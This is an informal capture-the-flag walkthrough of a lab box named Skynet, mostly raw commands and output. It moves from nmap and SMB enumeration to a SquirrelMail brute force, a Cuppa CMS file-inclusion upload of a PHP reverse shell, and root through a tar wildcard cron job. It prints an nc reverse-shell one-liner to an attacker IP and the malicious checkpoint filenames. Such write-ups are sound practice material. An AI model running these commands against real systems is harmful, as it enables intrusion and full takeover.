

smbclient // squirrelmail  //  hidden directory that leads to Cuppa CMS  //  upload shell to cuppa // escalate with cronjobs running



similar to kenobi  


nmap 10.10.43.97 -oN nmap0
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 11:28 EST
Nmap scan report for 10.10.43.97
Host is up (0.18s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds


└─# nmap -sV -O -sC -T5 -A 10.10.43.97 -oN nmap1   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 11:29 EST
Nmap scan report for 10.10.43.97
Host is up (0.11s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP PIPELINING SASL AUTH-RESP-CODE UIDL CAPA RESP-CODES
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS post-login more have ID ENABLE capabilities SASL-IR IDLE OK Pre-login listed LITERAL+ LOGINDISABLEDA0001 IMAP4rev1
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 7.1.1 - 7.1.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m01s, deviation: 3h27m51s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-02-24T10:30:14-06:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-24T16:30:14
|_  start_date: N/A

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   113.06 ms 10.9.0.1
2   114.07 ms 10.10.43.97

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.63 seconds






was all excited to do hydra on the searchbar but don't have a type of database we do have a samba share I beleive,,,

while waiting on dirb looking at samba




smbclient -L 10.10.43.97 
Enter WORKGROUP\root's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available


smbclient //10.10.43.97/anonymous
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> whoami
whoami: command not found
smb: \> getuid
getuid: command not found
smb: \> ls
  .                                   D        0  Thu Nov 26 11:04:00 2020
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019

		9204224 blocks of size 1024. 5831068 blocks available
smb: \> cat attention.txt
cat: command not found
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get logs
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \logs
smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 00:42:16 2019
  ..                                  D        0  Thu Nov 26 11:04:00 2020
  log2.txt                            N        0  Wed Sep 18 00:42:13 2019
  log1.txt                            N      471  Wed Sep 18 00:41:59 2019
  log3.txt                            N        0  Wed Sep 18 00:42:16 2019

		9204224 blocks of size 1024. 5831028 blocks available
smb: \logs\> cat log1.txt
cat: command not found
smb: \logs\> echo log1.txt
echo <num> <data>
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (1.0 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \logs\> get log2.txt
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \logs\> get log3.txt
getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \logs\> 


dirb shows squirrelmail,, yeay i get to do some hydra,,,

SquirrelMail version 1.4.23 [SVN]

Intercept with burpsuite to get hydra info,,,

POST /squirrelmail/src/redirect.php HTTP/1.1
Host: 10.10.43.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Origin: http://10.10.43.97
Connection: close
Referer: http://10.10.43.97/squirrelmail/src/login.php
Cookie: squirrelmail_language=en_US; SQMSESSID=7b03b0dq0ok4g9qqpqr39tsp45
Upgrade-Insecure-Requests: 1

login_username=milesdyson&secretkey=test&js_autodetect_results=1&just_logged_in=1


while waiting on hydra and dirb  decided to cat the files we got

─# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
                                                                                
┌──(root💀kali)-[/hackme/skynet]
└─# cat important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
                                                                                
┌──(root💀kali)-[/hackme/skynet]
└─# cat log1.txt     
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
                                                                                
┌──(root💀kali)-[/hackme/skynet]
└─# cat log2.txt
                                                                                
┌──(root💀kali)-[/hackme/skynet]
└─# cat log3.txt
                                                                                
┌──(root💀kali)-[/hackme/skynet]

from this we get a webpage with some info on Dr. Myles and a long list of paswords ???


milesdyson:cyborg007haloterminator

lucky first try,,,, 

so we are in his email,,,

We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

ahhhhhh, needed to further enumerate the new CMS /45kra24zxs28v3yd

we quickly get 

http://10.10.43.97/45kra24zxs28v3yd/administrator/

and cuppa

https://www.exploit-db.com/exploits/25971

make shell
used pentest monkey

nc on port 

python to serve 

and curl to upload

curl http://10.10.43.97/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php\?urlConfig\=http://10.9.4.45:80/shell.php

# nc -lvnp 4445                               
listening on [any] 4445 ...
connect to [10.9.4.45] from (UNKNOWN) [10.10.43.97] 58618
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 11:51:17 up  1:23,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
*/1 *	* * *   root	/home/milesdyson/backups/backup.sh
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *


if you get an error ,,, you are in the wrong directory  cd /var/www/html



echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.4.45 1234 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"




finally, after severallllll attempts lines matter, use above ,, 




nc -lvnp 1234                                                         130 ⨯
listening on [any] 1234 ...
connect to [10.9.4.45] from (UNKNOWN) [10.10.43.97] 41650
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)


